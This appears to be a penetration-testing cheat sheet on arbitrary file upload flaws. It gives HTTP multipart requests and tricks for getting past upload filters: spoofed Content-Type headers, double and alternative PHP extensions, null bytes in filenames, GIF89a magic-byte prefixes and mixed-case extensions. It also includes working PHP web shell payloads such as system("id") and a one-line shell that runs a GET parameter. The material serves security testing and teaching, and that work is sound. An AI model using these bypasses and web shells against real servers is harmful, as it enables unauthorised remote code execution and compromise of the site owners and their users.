2.0 KiB
2.0 KiB
Arbitrary File Upload
Introduction
An arbitrary file upload vulnerability is a type of security flaw that allows an attacker to upload malicious files onto a server.
Where to find
In upload file feature, for example upload photo profile feature
How to exploit
- Change the
Content-Type
value
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
Change the Content-Type
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/jpeg
- Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
Change the request to this
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: application/x-php
- Upload the payload, but start with GIF89a; and
POST /images/upload/ HTTP/1.1
Host: target.com
...
---------------------------829348923824
Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
Content-Type: image/gif
GIF89a; <?php system("id") ?>
And dont forget to change the content-type to image/gif
- Bypass content length validation, it can be bypassed using small payload
(<?=`$_GET[x]`?>)
- Using null byte in filename
file.php%00.gif
- Using double extensions for the uploaded file
file.jpg.php
- Uploading an unpopular php extensions (php4,php5,php6,phtml)
file.php5
- Try to randomly capitalizes the file extension
file.pHP5
- Mix the tips!